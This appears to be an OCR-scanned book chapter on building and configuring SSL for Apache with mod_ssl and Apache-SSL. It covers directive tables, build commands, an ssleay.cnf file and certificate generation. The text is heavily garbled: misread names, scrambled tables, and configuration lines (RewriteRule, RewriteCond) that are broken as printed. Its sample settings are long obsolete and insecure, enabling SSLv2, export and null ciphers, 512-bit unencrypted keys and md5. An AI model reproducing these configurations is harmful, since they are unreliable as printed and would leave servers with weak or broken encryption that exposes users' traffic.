After reading so much about Apache’s modular design, you’d expect that someone at 
some point would write a module that ties SSL into Apache’s overall feature set. In 
fact, several developers did just that, and of those efforts, the most popular is 
mod_ssl, which today ships with Apache 2.0. 


As per its documentation (http: //www.modssl.org/docs/2.8/ssl_faq.html#ToC1): 


The mod_ssl v1 package was initially created in April 1998 by Ralf S. Engelschall via porting 
Ben Laurie’s Apache-SSL 1.17 source patches for Apache 1.2.6 to Apache 1.3b6. Because of 
conflicts with Ben Laurie’s development cycle, it then was reassembled from scratch for 
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Apache 1.3.0 by merging the old mod_ss1 1.x with the newer Apache-SSL 1.18. From this 
point on, mod_ss1 lived its own life as mod_ss1 v2. The first publicly released version was 
mod_ssl 2.0.0 from August 10th, 1998. 


The mod_ss1 package 


...provides strong cryptography for the Apache (v1.3) Web server via the Secure Socket Layer 
(SSL v2/v3) and Transport Layer Security (TLS v1) protocols by the help of the excellent 
SSL/TLS implementation library OpenSSL from Eric A. Young and Tim Hudson. 


NOTE 


As I'll soon explain, folks sometimes confuse mod_ss1 with ApacheSSL. This is understandable, 
as they share roots. However, mod_ss1 is a module, whereas ApacheSSL is Apache internally 
modified to support SSL. 





Apache Distributions and mod_ss1l 


mod_ssl ships with Apache 2.0+. If you download a source-based distribution (the 
preferred method), you'll find it in http-version/modules/ssl1, which should 
contain the files enumerated in Table 15.1. 


TABLE 15.1 mod_ss1 Core Source Files 





File Function 

config.m4 Autoconf stub for the Apache config mechanism 
Makefile.in Makefile template for Unix platform 
mod_ssl.c Main source file containing API structures 
mod_ssl.h Common header file of mod_ss1 

README This file is self-explanatory 
ssl_engine_config.c Module configuration handling 
ssl_engine_dh.c DSA/DH support 

ssl_engine_ds.c Data structures 

ssl_engine_ext.c Extensions to other Apache parts 
ssl_engine_init.c Module initialization 

ssl_engine_io.c 1/O support 

ssl_engine_kernel.c SSL engine kernel 

ssl_engine_log.c Logfile support 

ssl_engine_mutex.c Mutual exclusion support 
ssl_engine_pphrase.c Pass-phrase handling 
ssl_engine_rand.c PRNG support 


ssl_engine_vars.c Variable expansion support 


TABLE 15.1 Continued 
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File Function 
ssl_expr.c Expression handling main source 
ssl_expr.h Expression handling common header 


ssl_expr_eval.c 
ssl_expr_parse.c 
ssl_expr_parse.h 
ssl_expr_parse.y 
ssl_expr_scan.c 
ssl_expr_scan.1 
ssl_scache.c 
ssl_scache_dbm.c 


ssl_scache_shmcb. 
ssl_scache_shmht. 


ssl_util.c 
ssl_util_ssl.c 
ssl_util_ssl.h 
ssl_util_table.c 
ssl_util_table.h 


Expression machine evaluation 

Expression parser automaton (pre-generated) 
Expression parser header (pre-generated) 
Expression parser source 

Expression scanner automaton (pre-generated) 
Expression scanner source 

Session cache abstraction layer 

Session cache via DBM file 

Session cache via shared memory cyclic buffer 
Session cache via shared memory hash table 
Utility functions 

The OpenSSL companion source 

The OpenSSL companion header 

The hash table library source 

The hash table library header 





Functions that reside within the aforementioned files include the following (xxxx is 


the version number): 
e ap_xxxx()—Apache API function 
e ssl_xxxx()—mod_ss1 function 
e SSL_xxxx()—OpenSSL function (SSL library) 
e OpenSSL_xxxx()—OpenSSL function (SSL library) 
e X509_xxxx()—OpenSSL function (Crypto library) 
e PEM_xxxx()—OpenSSL function (Crypto library) 
e EVP_xxxx()—OpenSSL function (Crypto library) 


e RSA_xxxx()—OpenSSL function (Crypto library) 


Finally, mod_ss1 uses several data structures: 
e server_rec—Apache Virtual Server 
e conn_rec—Apache Connection 


e BUFF—Apache Connection Buffer 


346 


CHAPTER 15 Apache/SSL 


request_rec—Apache Request 
SSLModConfig—mod_ss1 Global Module Configuration 
SSLSrvConfig—mod_ss1 Virtual Server Configuration 
SSLDirConfig—mod_ss1 Directory Configuration 
SSL_CTX—OpenSSL Context 
SSL_METHOD—OpenSSL Protocol Method 
SSL_CIPHER—OpenSSL Cipher 
SSL_SESSION—OpenSSL Session 

ssL—OpenSSL Connection 

BI0O—OpenSSL Connection Buffer 


SSLFilterRec—mod_ss1 Filter Context 


Installing mod_ss1 


To derive a working mod_ss1 configuration from source code (other than for Apache 
2.0, as I’ll soon explain), obtain these packages: 


apache_1.3.24.tar.gz, available at http: //httpd.apache.org/dist/httpd/ 


mod_ssl-2.8.8-1.3.24.tar.gz or higher, available at 
ftp://ftp.modssl.org/source/ 


openss1-0.9.6c.tar.gz or higher, available at 
ftp://ftp.openssl.org/source/ 


Next, unpack these archives: 


$ gzip -d -c apache_1.3.24.tar.gz | tar xvf - 
$ gzip -d -c mod_ssl-2.8.8-1.3.24.tar.gz | tar xvf - 
$ gzip -d -c openssl-0.9.6c.tar.gz | tar xvf - 


The next phase is important because of sequencing. First, build OpenSSL: 


$ cd openssl-0.9.6c 
$ ./config 
$ make 


mod_ssl 


Next, build Apache and compile in OpenSSL support: 


$ cd mod_ssl-2.8.8-1.3.24 

$ ./configure \ 
--with-apache=../apache_1.3.24 \ 
--with-ssl=../openssl-0.9.6c \ 
--prefix=/usr/local/apache 

Cd! si 

cd apache_1.3.24 

make 

make certificate 

make install 


AA G A 7 


$ /usr/local/apache/bin/httpd -DSSL 
$ netscape https: //www. your-web-host.net/ 


Installation is a relatively simple procedure. Next, you must establish your 
configuration. 


Using Your New mod_ss1 Configuration 
mod_ssl supports many directives. Table 15.2 summarizes them and their functions. 


TABLE 15.2 mod_ss1 Directives 


Directive Function 





SSLCACertificateFile Use the SSLCACertificateFile directive to specify a file that 
contains not one but several certificates. 

SSLCACertificatePath Use the SSLCACertificatePath directive to specify from what 
certificate authorities you'll accept a client's certificate. 

SSLCARevocationFile This points to a file where you store the Certificate Revocation Lists 
(CRL) of Certification Authorities (CA) clients. 

SSLCARevocationPath This points to the path where you store the Certificate Revocation 
Lists file of Certification Authorities (CA) clients. 

SSLCertificateFile Use the SSLCertificateFile directive to specify the location of 
your single certificate file (* . pem). 

sSLCertificateKeyFile Use the SSLCertificateKeyFile directive to specify the location of 


your private key file. 

SSLCipherSuite This enables you to specify the cipher or ciphers your server should 
support (kRSA, kDHr, KDHd, kKEDH, aNULL, aRSA, aDSS, aDH, 
eNULL, DES, 3DES, RC4, RC2, IDEA, MDS, SHA1, SHA,, SLv2, 
SSLv3, TLSv1, EXP, EXPORT40, EXPORT56, LOW, MEDIUM, HIGH, 
RSA, DH, EDH, ADH, DSS, or NULL). 
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TABLE 15.2 Continued 





Directive 


Function 





SSLEngine 


SSLLog 
SSLLogLevel 


SSLOptions 


SSLPassPhraseDialog 


SSLProtocol 


SSLRandomSeed 


SSLRequire 


SSLRequireSSL 


SSLSessionCache 


SSLSessionCacheTimeout 


SSLVerifyClient 


This enables you to turn the SSLEngine on or off. Why would you 
need this if your server supports SSL? Here’s why: Perhaps only one 
area of your site needs SSL. Hence, embedding this directive in a 
virtual host block enables SSL for that virtual host only. 

This enables you to specify the path and filename of the SSL log. 
This enables you to specify the log level that mod_ss1 will use 
(none, error, warn, info, trace, and debug). 

This directive enables you to establish certain options (backward 
compatibility, CGI environment variables, and so on). 

This directive enables you to specify whether the Web administra- 
tor (usually, you) must interactively enter the passphrase or not. If 
not, it provides functionality to pass this process to a program or 
script. 

This enables you to specify what protocol to use (for example, 
Transport Layer Security protocol, standard SSL, and so on). 

This directive enables you to specify what random seed generator 
you'd like to use. That is, you needn’t use the default; you could 
use an external generator (based in your operating system), a 
third-party tool, or even an application of your own design. 

This directive specifies a general access requirement that has to be 
fulfilled in order to allow access (and you can trigger requires on 
words, digits, regular expressions, variables, and so forth). 

This directive forbids access unless HTTP over SSL (that is, HTTPS) 
is enabled for the current connection. 

This configures the storage type (dbm or shm hash) of the 
global/interprocess SSL Session Cache. 

Use this to specify, in seconds, the time after which a session 
times out. 

Use the SSLVerifyClient directive to set your servers paranoia 
level. Levels run from 0 (no certificate at all required) to 3 (the 
client must present—at the least—a valid certificate). 





Here’s a typical configuration, applied to a particular directory: 


<Directory /usr/local/apache/htdocs/pearson> 


# Support all sorts of ciphers 
SSLCipherSuite ALL: !ADH:RC4+RSA:+HIGH: +MEDIUM: +LOW: +SSLv2:+EXP:+eNULL 
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# Some characteristics of the session 


SSLVerifyDepth 1 
SSLCACertificateFile conf/ssl.crt/your-company-ca.crt 
SSLOptions +FakeBasicAuth +StrictRequire 


# Make sure they're using strong SSL 
SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128 


# Some rules to apply to clients who can connect 

SSLRequireSSL 

SSLRequire %{SSL_CLIENT_S_DN_O} eq "Pearson" and \ 
%{SSL_CLIENT_S DN OU} in {"Editorial", "CA", "Dev"} 

# Force HTTPS 


RewriteEngine on 

RewriteCond %{REMOTE_ADDR} !*192\.168\.1\.[0-9]+$ 
RewriteCond %{HTTPS} !=on 

RewriteRule * = [F] 


# Network Access and Basic Auth 
Satisfy any 


# Network Access Control 


Order deny,allow 
Deny all 
Allow www. mcp. com 


# Basic Authentication 


AuthType basic 

AuthName "Protected Area" 
AuthUserFile conf /users.passwd 
Require valid-user 
</Directory> 


mod_ss1 is very good for a quick start (and comes in binary distributions, too). 
However, perhaps you want to build your SSL host from scratch. That’s possible too, 
with Apache-SSL. 


What is Apache-SSL? 


Apache-SSL is a secure Web server, based on Apache and SSLeay/OpenSSL. It is 
licensed under a BSD-style license, which means, in short, that you are free to use it 
for commercial or noncommercial purposes, so long as you retain the copyright 
notices. 
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However, as noted in Apache-SSL’s documentation: 


There appears to be some confusion regarding Apache-SSL and mod_ss1. To set the record 
straight: mod_ss1 is not a replacement for Apache-SSL—it is an alternative, in the same way 
that Apache is an alternative to Netscape/Microsoft servers, or Linux is an alternative to 
FreeBSD. It is a matter of personal choice as to which you run. mod_ss1 is what is known as a 
‘split’/—that is, it was originally derived from Apache-SSL, but has been extensively redevel- 


oped so the code now bears little relation to the original. 


Installing Apache-SSL 


To install Apache-SSL, you'll need three things: 


e apache_1.3.22+ssl_1.45, available at 
ftp://ftp.zedz.net/pub/crypto/mirror/ftp.apache-ssl.org. 


e openssl-0.9.5a or better, is available at http: //www.openssl.org/ or SSLeay, 
which is available at http: //www.openssl.org/ or 
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/. 


e The Apache-SSL patches are available here: 
ftp://ftp.ox.ac.uk/pub/crypto/SSL/Apache-SSL/ 


In the following example, I use Apache 1.2.6 and SSLeay 0.81b. Here’s why: I know 
that this example works on several Unix platforms. Homegrown, compile-it-yourself 
Apache-SSL versions are quirky and might not come off clean on all platforms. 
(Locations of prefabbed packages are provided for the faint of heart.) The following 
example, however, will probably work with later versions (with a little effort). The 
chief exercise here is to generically demonstrate the installation process. 


Unpacking, Compiling, and Installing OpenSSL 


To unpack SSLeay, copy SSLeay-version.tar.gz to /usr/src, unzip the compressed 
file, and untar the archive: 


cp SSLeay-Q 8 1b tar.gz /usr/src 
cd /usr/src 

gunzip SSLeay-@ 8 1b tar.gz 
tar-xvf SSLeay-® 8 1b tar 


SSLeay will extract to /usr/src/SSLeay-version/. Next, change to that directory and 
run Configure: 


cd /SSLeay-0.8.1b 
perl ./Configure linux-elf 
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Note that the previous example is for Linux ELF systems only. If your architecture or 
target is different, start Configure without arguments and it will print a wide range 


of options: 


# perl ./Configure 


Usage: Configure [-Dxxx] [-Lxxx] [-1xxx] os/compiler 


pick os/compiler from: 


BC-16 BC-32 

NetBSD - x86 SINIX-N 

VC -W31 -16 VC -W31 -32 

aix-cc aix-gcc 
alpha400-cc bsdi-gcc 
debug-irix-cc debug - linux -elf 
dgux -R4-x86-gcc dist 

hpux-gcc hpux-kr-cc 

linux -aout linux -elf 
$c05-CC solaris-sparc-cc 


solaris-usparc-sc4 solaris-x86-gcc 
unixware-2.0 


FreeBSD 

VC -MSDOS 

VC -WIN16 
alpha-cc 

cc 
dgux-R3-gcc 
gcc 

irix-cc 
nextstep 
solaris-sparc-gcc 
sunos -cc 


unixware-2.0-pentium 


NetBSD-sparc 
VC-NT 

VC -WIN32 
alpha-gcc 
debug 

dgux -R4-gcc 
hpux -cc 
irix-gcc 
purify 
solaris-sparc-sc4 
sunos -gcc 


Note that in addition to architecture and binary targets, you can also set other 
options at the Configure command line, including 


e DES PTR—Use this option to specify that during the build, you want pointer 
lookup versus arrays in the DES in crypto/des/des_locl.h. 


e DES RISCi—Use this option to specify a different DES_ENCRYPT macro that helps 
reduce register dependencies (a good choice for RISC architecture). 


e -DNO_BF—Use this option to build SSLeay without Blowfish support. 


e -DNO_DES—Use this option to build SSLeay without DES/3DES support. 


e -DNO_IDEA—Use this option to build SSLeay with no IDEA support. 


e -DNO_MD2—Use this option to build SSLeay without MD2 support. 


e -DNO_RC2—Use this option to build SSLeay with no RC2 support. 


e -DNO_RC4—Use this option to build SSLeay with no RC4 support. 





e -DRSAref—Use this option to build SSLeay to use RSAref. 


NOTE 





Other more obscure options also exist. For example, you can specify to use int instead of 
long in DES if need be. Check the SSLeay documentation for more information. 
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After you define your architecture and options, run Configure. In response, it will 
print out a brief summary of your premake configuration. Here’s an example: 


[root@linux7 SSLeay-@.8.1b]# perl Configure linux-elf 
cc =gcc 

CFLAG =-DL_ENDIAN -DTERMIO -03 -fomit-frame-pointer -m486 -Wall 
-Wuninitialized 

EX_LIBS= 

BN_MULW=asm/x86-1nx.o 

DES_ENC=asm/dx86-elf.o asm/cx86-elf.o 

BF_ENC =asm/bx86-elf.o 

THIRTY_TWO_BIT mode 

DES_PTR used 

DES_RISC1 used 

DES_UNROLL used 

BN_LLONG mode 

RC4_INDEX mode 

BF_PTR2 used 


I recommend clipping and pasting these values to a temporary file. Some options on 
certain systems can trigger a bad make, and you might be forced to change them later. 
It’s nice to have them handy in that event. 


Next, run make: 


make 


The make will take several minutes, but if you have ANSI C support installed, you 
shouldn’t have any problems here. You’ll know that you have a successful make 
when you see this message: 


NOTE: The OpenSSL header files have been moved from include/*.h 
to include/openssl/*.h. To include OpenSSL header files, now 
to include/openssl/*.h. To include OpenSSL header files, now 
directives of the form 

#include <openss1/foo.h> 
should be used instead of #include <foo.h>. 
These new file locations allow installing the OpenSSL header 
files in /usr/local/include/openssl/ and should help avoid 
conflicts with other libraries. 


To compile programs that use the old form <foo.h>, 
usually an additional compiler option will suffice: E.g., add 
-I/usr/local/ss1/include/openssl 
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or 
-I/openssl1-0.9.3a/include/openssl 

to the CFLAGS in the Makefile of the program that you want to compile 

(and leave all the original -I...'s in place!). 


Please make sure that no old OpenSSL header files are around: 
The include directory should now be empty except for the openssl 
subdirectory. 


After you verify that the make was successful, run this command: 


make rehash 


Finally, try a test, like this: 
make test 
Here you might encounter problems. On some systems, the optimization flags in the 


Makefile will cause the test to fail. If that happens, edit the Makefile and remove the 
optimization flag from the CLFAGS option line. 


Depending on your system’s configuration, the relevant line will be either line 59 or 
60, whichever is not commented out: 


CFLAG= -DL_ENDIAN -DTERMIO -03 -fomit-frame-pointer -m486 -Wall -Wuninitialized 


Here is the optimization flag to remove: 
-03 


After you remove the optimization flag, start again (make clean; make) and every- 
thing should be fine. 


WARNING 


On Caldera OpenLinux 1.2, even if you change the -03 optimization flag, the make test will 
fail (during the randtest procedure). Apparently, SSLeay doesn’t like 1.2’s random. 





You’ll know when your make test is clean when you see this message: 


Signed certificate is in newcert.pem 
newcert.pem: OK 

make[1]: Leaving directory ‘/SSLeay-@.9.Qb/test' 
SSLeay 0.9.0b 29-Jun-1998 

built on Wed Jun 30 01:20:01 PDT 1999 
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options:bn(64,32) md2(int) rc4(idx,int) des(ptr,risc1,16,long) idea(int) 
blowfish(ptr2) 

C flags:gcc -DL_ENDIAN -DTERMIO -DBN_ASM -03 -fomit-frame-pointer -m486 
-Wall -Wuninitialized -DSHA1_ASM -DMD5 ASM -DRMD160_ASM 

After you verify that your test was successful, install the package like this: 


make install 


Unpacking, Patching, and Installing Apache 


Next, copy apache_version_tar.gz to /usr/src and unpack it: 


cp apache_1 2 6 tar.gz /usr/src 
cd /usr/src 
gunzip apache_1 2 6 tar.gz 


tar -xvf apache_1_2 6 tar 


Apache will unpack to /usr/src/apache-version/. After you verify that it unpacked 
correctly, copy apache_1_2_6+ssl_version_tar.gz to /usr/src/apache-version and 
unpack it: 


cp apache_1_2 6+ssl_1_17_tar.gz /usr/src/apache-1.2.6 
cd /usr/src/apache-1.2.6 
gunzip apache_1_2 6+ssl_1_17_tar.gz 
tar -xvf apache_1_2 6+ssl_1_17_tar 
This should unpack at least the following files: 
e ben.pgp.key.asc—The author’s PGP public key 
e EXTRAS.SSL—Documentation on extra features 
e LICENCE.SSL—The Apache-SSL license 
e md5sums—MD5 checksums for these files (using mdSsum) 
e md5sums.asc—The author’s detached signature of md5sums 
e README.SSL—A brief overview 
e SECURITY—Reflections on SSL and security 
e src/apache_ssl.c—An extra module for Apache 
e SSLconf/conf/access.conf—An empty Apache access configuration file 


e SSLconf/conf/httpd.conf—A sample httpd.conf file 
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e SSLconf/conf/mime.types—A sample mime.types configuration file 
e SSLconf/conf/srm.conf—An emery Apache srm configuration file 


èe SSLpatch—A vital patch file (we’ll use it in a moment) 


After verifying that the files unpacked properly (and before compiling Apache), apply 
the supplied patch, like this: 


patch -p1 < SSLpatch 

Next, change to /usr/src/apache-version/src/, copy Configuration.tmpl to 
Configuration, and open Configuration for editing. In it, (among other possible 
things) you must change the SSL_BASE variable. (This tells Apache where to find the 


SSL libraries during compilation.) To change that value, open Configuration and go 
to line 63. It should look like this: 


#SSL_BASE= /u/ben/work/scuzzy-ssleay6 


Change this to the SSLeay source directory. For this example, I changed mine to 


SSL_BASE=/usr/src/SSLeay-0.8.1b 


When you set the SSL_BASE variable and exit, you’re ready to make Apache: 

make 

To verify that your make went smoothly, check /usr/src/apache_version/src for the 
following file: 


-rwxr-xr-xX 1 root root 543482 Jan 30 04:00 httpsd 
If it exists, you’re in business. Time to move on to certificate generation. 


Preparing to Generate a Certificate 
Before you can generate a certificate, you must first configure ssleay.cnf. To do so, 
change to /usr/local/ss1/1lib/. Here’s what the file looks like by default: 


# SSLeay example configuration file. 
# This is mostly being used for generation of certificate requests. 


# 

RANDFILE = $ENV: :HOME/ . rnd 

HEAP EAE HE EAE AE AEE EE AEE EAE EEA BEA EEA AEA AE EE EE EA EEE 
[ ca ] 


default_ca = CA default # The default ca section 
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HEE HE EAE HE EAE AEE AEE HE EAE EAE AEE EA EEA AEA A EE PE EE EE 


[ CA default ] 


dir = ./demoCA # 
certs = $dir/certs # 
crl_dir = $dir/crl # 
database = $dir/index.txt # 
new_certs dir = $dir/newcerts # 
certificate = $dir/cacert.pem # 
serial = $dir/serial # 
crl = $dir/crl.pem # 
private_key = $dir/private/cakey.pem# 
RANDFILE = $dir/private/.rand # 
x509 extensions = x509v3_ extensions # 
cert 

default_days = 365 # 
default_crl_days= 30 # 
default_md = md5 # 
preserve = no # 


Where everything is kept 

Where the issued certs are kept 
Where the issued crl are kept 
database index file. 

default place for new certs. 


The CA certificate 

The current serial number 
The current CRL 

The private key 

private random number file 


The extentions to add to the 


how long to certify for 

how long before next CRL 
which md to use. 

keep passed DN ordering 


# A few different ways of specifying how similar the request should look 


# For type CA, the listed attributes must 
# and supplied fields are just that :-) 
policy = policy_match 


# For the CA policy 
[ policy_match ] 


countryName = match 
stateOrProvinceName = match 
organizationName = match 
organizationalUnitName = optional 
commonName = supplied 
emailAddress = optional 


# For the ‘anything’ policy 


be the same, and the optional 


# At this point in time, you must list all acceptable ‘object’ 


# types. 

[ policy_anything ] 

countryName optional 
stateOrProvinceName = optional 
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localityName = optional 
organizationName = optional 
organizationalUnitName = optional 
commonName = supplied 
emailAddress = optional 


HEAP HE HEHEHE EAE AEE AEE HE AEE EAE EEE EE EAA AEA A EAE EE EE EEE 


[ req ] 

default_bits = 1024 

default_keyfile = privkey.pem 
distinguished_name = req_distinguished_name 
attributes = req_attributes 
attributes = req_attributes 


[ req_distinguished_name ] 


countryName = Country Name (2 letter code) 
countryName_default = AU 

countryName_min =2 

countryName_max =2 

stateOrProvinceName = State or Province Name (full name) 
stateOrProvinceName_default = Some-State 

localityName = Locality Name (eg, city) 


Q@.organizationName Organization Name (eg, company) 
@.organizationName_ default = Internet Widgits Pty Ltd 


# we can do this but it is not needed normally :-) 


#1.organizationName = Second Organization Name (eg, company) 
#1.organizationName_default = CryptSoft Pty Ltd 
organizationalUnitName = Organizational Unit Name (eg, section) 


#organizationalUnitName_ default 


commonName = Common Name (eg, YOUR name) 
commonName_max = 64 
emailAddress = Email Address 


emailAddress_max = 40 
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[ req_attributes ] 


challengePassword = A challenge password 
challengePassword_min = 4 

challengePassword_max = 20 

unstructuredName = An optional company name 

[ x509v3_extensions ] 

nsCaRevocationUrl = http://ww.cryptsoft.com/ca-crl.pem 
nsComment = "This is a comment" 


# under ASN.1, the @ bit would be encoded as 80 
nsCertType = 0x40 


#nsBaseUr1l 
#nsRevocationUrl 
#nsRenewalUrl 
#nsCaPolicyUrl 
#nsSslServerName 
#nsCertSequence 
#nsCertExt 
#nsDataType 


You must determine what these values should be. (Some will be hard-coded into 
your certificate and displayed when visitors connect.) However, you can set just a 
few and define the rest in interactive mode when you generate your certificate. For 
example, you could use a brief file, such as this: 


# The following variables are defined. For this example I will 
#populate the various values 
[ req ] 

default_bits = 512 
default_keyfile = testkey.pem 


default number of bits to use. 

Where to write the generated keyfile 
if not specified. 

The section that contains the 
information about which 'object' we 
want to put in the DN. 

The objects we want for the 
attributes field. 

Should we encrypt newly generated 
keys. I strongly recommend ‘yes'. 


distinguished_name= req_dn 


attributes = req_attr 


encrypt_rsa_key = no 


E eH HR HH KR HK HK HK 
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# The distinguished name section. For the following entries, the 

# object names must exist in the SSLeay header file objects.h. If they 
# do not, they will be silently ignored. The entries have the following 
# format. 

# <object_name> => string to prompt with 

# <object_name>_default => default value for people 

# <object_name>_value => Automatically use this value for this field. 
# <object_name>_min => minimum number of characters for data (def. Q) 
# <object_name>_max => maximum number of characters for data (def. 
inf.) 

# All of these entries are optional except for the first one. 

[ req_dn ] 

countryName = Country Name (2 letter code) 
countryName_default = AU 

stateOrProvinceName = State or Province Name (full name) 


stateOrProvinceName_default = Queensland 


After you define your desired options, return to /usr/src/apache_1.2.6/src and 
issue the following command: 


make certificate 


Here, SSLeay will walk you through the process interactively: 


[root@linux7 apache_1.2.6]# cd /usr/src/apache_1.2.6/ 
[root@linux7 apache _1.2.6]# cd src 

[root@linux7 src]# make certificate 
/usr/src/SSLeay-0.8.1b/apps/ssleay req -config 
/usr/src/SSLeay-0.8.1b/crypto/conf/ssleay.cnf \ 

-new -x509 -nodes -out ../SSLconf/conf/httpsd.pem \ 
-keyout ../SSLconf/conf/httpsd.pem; \ 

In -sf ../SSLconf/conf/httpsd.pem 

../SSLconf /conf/*/usr/src/SSLeay-0.8.1b/apps/ssleay \ 
x509 -noout -hash < ../SSLconf/conf/httpsd.pem .0 
Using configuration from /usr/src/SSLeay -0.8.1b/crypto/conf/ssleay.cnf 
Generating a 512 bit RSA private key 


wena tttt+ 

writing new private key to '../SSLconf/conf/httpsd.pem' 

You are about to be asked to enter information that will be incorporated 
into your certificate request. 
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What you are about to enter is what is called a Distinguished Name 
or a DN. 

There are quite a few fields but you can leave some blank 

For some fields there will be a default value, 

If you enter '.', the field will be left blank. 

Country Name (2 letter code) [AU]: 

State or Province Name (full name) [Queensland] :California 
Locality Name (eg, city) []:Malibu 

Organization Name (eg, company) [Mincom Pty Ltd]:Macmillan Publishing 
Organizational Unit Name (eg, section) [MTR] :SAMS 

Common Name (eg, YOUR name) []:Anonymous 

Email Address []:maxlinsec@altavista.net 


This will generate your certificate (nttpsd.pem) and place it here: 


/usr/src/apache_1.2.6/SSLconf/conf/httpsd.pem 


You’re nearly done. What remains is to configure httpsd’s startup files. 


Configuring httpsd Startup Files 


You'll find sample configuration files (access.conf-dist, httpd.conf-dist, and 
srm.conf-dist) in /usr/src/apache_version/conf. These files are actually empty in 
some SSLeay distributions, but don’t worry. In many respects, you can set options in 
these files precisely as you would for a normal Apache install. 


The directives and options that differ from standard Apache values point to various 
resources (like your certificate). Here’s a very lightweight example: 


ServerType standalone 

Port 80 

Listen 443 

User webssl 

Group webssl 

ServerAdmin webmaster@samshacker.net 
ServerRoot /var/httpd/ 

ErrorLog logs/error_log 
TransferLog logs/access_ log 
PidFile logs/httpd.pid 
ServerName linux7.samshacker.net 
MinSpareServers 3 
MaxSpareServers 20 

StartServers 3 
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SSLCACertificatePath /var/httpd/conf 
SSLCACertificateFile /var/httpd/conf/httpsd.pem 
SSLCertificateFile /var/httpd/conf/httpsd.pem 
SSLLogFile /var/httpd/logs/ssl.log 
SSLCacheServerPort 8080 

SSLCacheServerPath /usr/src/SSLeay-0.8.1b 
SSLSessionCacheTimeout 10000 


Note that in order for the server to find your certificates, you must specify the 
correct directory and ensure that the certificates are actually there. For example, if 
you define this as your certificate file: 


SSLCertificateFile /var/httpd/conf/httpsd.pem 


You must copy httpsd.pem from here: 


/usr/src/apache_1.2.6/SSLconf/conf/httpsd.pem 


to here: 


/var/httpd/conf/httpsd.pem 


Testing the Server 


Lastly, before installing httpsd to its final resting place and cleaning up, you should 
test your server. To do so, issue the httpsd command plus the -f flag defining your 
configuration file’s location. For example: 


httpsd -f /var/httpd/conf/httpd.conf 


or 


httpsd -f /usr/src/apache_1.2.6/conf/httpd.conf 


In response, httpsd will start up: 


./httpsd -f /usr/src/apache_1.2.6/conf/httpd.conf 
Reading certificate and key for server linux7.samshacker.net:8080 
PID 1342 


To test drive your new Apache-SSL server, crank up Netscape Communicator and 
connect to the port you assigned httpsd to. If your server is running correctly, 
Netscape will notify you with a New Site Certificate window, as in Figure 15.1. 
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Netscape; New Site Certificate 





FIGURE 15.1 The Netscape New Site Certificate Notification window. 


Choose Next to examine details about the certificate. In response, Netscape 
Communicator will report the certificate’s owner, signer, and encryption strength, 
shown in Figure 15.2. 


cape: New Site Certificate 





FIGURE 15.2 Communicator’s report on the current certificate. 


To see expanded certificate information, choose More Info. Here, Communicator will 
display the identity, distinguished name, location, and duration of validity for the 
current certificate as shown in Figure 15.3. 


Because it doesn’t initially recognize the certificate, Communicator will next prompt 
you to accept or decline it for the current sessions (see Figure 15.4). 
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Netscape; View A Certificate 





FIGURE 15.3 Certificate details. 


Netscape: New Site Certificate 





FIGURE 15.4 Communicator requests authorization to accept the current certificate. 


If you choose to accept the certificate, Netscape will advise you that even though the 
current session will be encrypted, it might not necessarily protect you from fraud. 
And, by default, Netscape highlights the option to notify you whenever you send 
data to the server as shown in Figure 15.5. 


Finally, when you accept the certificate, Netscape will notify you that the current 
session is being encrypted, but that you can later decide not to trust the certificate 
(see Figure 15.6). 
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Netscape: New Site Certificate 





FIGURE 15.5 Communicator’s advisory statement on fraud. 


Netscape: New Site Certificate 





FIGURE 15.6 Communicator’s final advisory about the current certificate and session. 


Configuration Notes 

Fine-tuning your Apache-SSL configuration works in precisely the same manner as 
traditional Apache. In fact, from a configuration viewpoint, Apache-SSL takes 
nothing away, but instead adds several features. For example, in addition to tradi- 
tional Apache environment variables, Apache-SSL supports SSL-centric environment 
variables. These are summarized in Table 15.3. 
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TABLE 15.3 Apache-SSL Environment Variables 


Field 


Significance 





HTTPS 
HTTPS_CIPHER 


HTTPS_KEYSIZE 


HTTPS_SECRETKEYSIZE 


SSL_CIPHER 


SSL_CLIENT_<x509> 


SSL_CLIENT_CERT 


SSL_CLIENT_CERT_CHAIN_n 





SSL_CLIENT_DN 


SSL_CLIENT_I_<x509> 





SSL_CLIENT_I_DN 


SSL_PROTOCOL_VERSION 


SSL_SERVER_<x509> 


SSL_SERVER_DN 


SSL_SERVER_I_<x509> 


SSL_SERVER_I_DN 


SSL_SSLEAY_VERSION 


The HTTPS variable specifies whether the server is using HTTPS. 
The HTTPS_CIPHER environment variable specifies which cipher is 
being used. 

The HTTPS_KEYSIZE environment variable specifies the session key 
size. 

The HTTPS_SECRETKEYSIZE environment variable specifies what 
secret key size is being used. 

The SSL_CIPHER environment variable specifies which cipher is 
being used. 

The SSL_CLIENT_<x509> specifies the component of the client’s 
DN. 
The SSL_CLIENT_CERT environment variable specifies the Base64 
encoding of the client's certificate. 

The SSL_CLIENT_CERT_CHAIN_n environment variable specifies the 
Base64 encoding of the client’s certificate chain. 

The SSL_CLIENT_DN environment variable specifies the DN 
(Distinguished Name) in the client's certificate. 





The SSL_CLIENT_I_<x509> environment variable specifies a 
component of the client’s issuer DN. 

The SSL_CLIENT_I_DN specifies the DN of the client's certificate 
issuer. 
The SSL_PROTOCOL_VERSION environment variable specifies what 
SSL version is being used. 

The SSL_SERVER_<x509> environment variable specifies a compo- 
nent of the server’s DN. 

The SSL_SERVER_DN environment variable specifies the DN in the 
server's certificate. 

The SSL_SERVER_I_<x509> environment variable specifies a 
component of the server's certificate issuer’s DN. 

The SSL_SERVER_I_DN environment variable specifies the server's 
certificate issue’s DN. 

The SSL_SSLEAY_VERSION environment variable specifies what 
SSLeay version is being used. 








You can display these environment variables from CGI scripts in the usual way: 


print "$ENV{'SSL_CLIENT_CERT'}\n"; 
print "SENV{'SSL_CIPHER'}\n"; 
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And finally, Apache-SSL supports several SSL-centric configuration directives (the 
majority of which go into httpd.conf, access.conf, or .htaccess). These are 


summarized in Table 15.4. 


TABLE 15.4 Apache-SSL Directives 





Field Significance 

CustomLog CustomLog works just like it does with standard Apache. The only 
difference is that in Apache-SSL, you can log several additional 
values, including the session cipher, the client certificate, failed 
authentication, and the SSL version. 

HTTPS The HTTPS variable specifies whether the server is using HTTPS. 


HTTPS_CIPHER 


HTTPS_KEYSIZE 


HTTPS_SECRETKEYSIZE 


SSLBanCipher 


SSLCACertificateFile 


SSLCACertificatePath 


SSLCacheServerPath 


SSLCacheServerPort 


SSLCacheServerRunDir 


SSLCertificateFile 


SSLCertificateKeyFile 


SSLDisable 


SSLEnable 


The HTTPS_CIPHER environment variable specifies which cipher is 
being used. (SSL or TLS) 

